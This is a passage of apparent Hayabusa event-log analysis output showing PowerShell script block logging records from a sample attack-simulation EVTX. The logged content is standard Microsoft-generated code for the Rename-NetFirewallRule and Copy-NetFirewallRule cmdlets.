}",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.676 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function 
Rename-NetFirewallRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction[]] ${Direction}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action[]] ${Action}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal[]] ${EdgeTraversalPolicy}, [Parameter(ParameterSetName='ByQuery')] [Alias('LSM')] [ValidateNotNull()] [bool[]] ${LooseSourceMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${LocalOnlyMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Owner}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] 
[string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallApplicationFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetNetworkLayerSecurityFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallSecurityFilter}, 
[Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallServiceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName', Mandatory=$true)] [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [Parameter(ParameterSetName='ByQuery', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true)] 
[Parameter(ParameterSetName='GetAll', Mandatory=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true)] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAl",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.676 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"l')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object 
$script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains 
$PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Direction') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Direction}) $__cmdletization_queryBuilder.FilterByProperty('Direction', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Action') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Action}) $__cmdletization_queryBuilder.FilterByProperty('Action', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EdgeTraversalPolicy') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EdgeTraversalPolicy}) $__cmdletization_queryBuilder.FilterByProperty('EdgeTraversalPolicy', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LooseSourceMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LooseSourceMapping}) $__cmdletization_queryBuilder.FilterByProperty('LooseSourceMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LocalOnlyMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LocalOnlyMapping}) $__cmdletization_queryBuilder.FilterByProperty('LocalOnlyMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Owner') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Owner}) $__cmdletization_queryBuilder.FilterByProperty('Owner', 
$__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetFirewallRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallApplicationFilter') -and (@('ByAssociatedNetFirewallApplicationFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallApplicationFilter}, 'MSFT_NetFirewallRuleFilterByApplication', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains 
$PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetFirewallRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetFirewallRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetFirewallRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallSecurityFilter') -and (@('ByAssociatedNetFirewallSecurityFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallSecurityFilter}, 'MSFT_NetFirewallRuleFilterBySecurity', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallServiceFilter') -and (@('ByAssociatedNetFirewallServiceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallServiceFilter}, 'MSFT_NetFirewallRuleFilterByService', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetFirewallRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and 
(@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 
'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent}",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.676 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"} $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo 
@('Rename', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.676 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Copy-NetFirewallRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, 
[Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction[]] ${Direction}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action[]] ${Action}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal[]] ${EdgeTraversalPolicy}, [Parameter(ParameterSetName='ByQuery')] [Alias('LSM')] [ValidateNotNull()] [bool[]] ${LooseSourceMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${LocalOnlyMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Owner}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallApplicationFilter}, 
[Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter', Mandatory=$true, ValueFromPipeline=$true)] 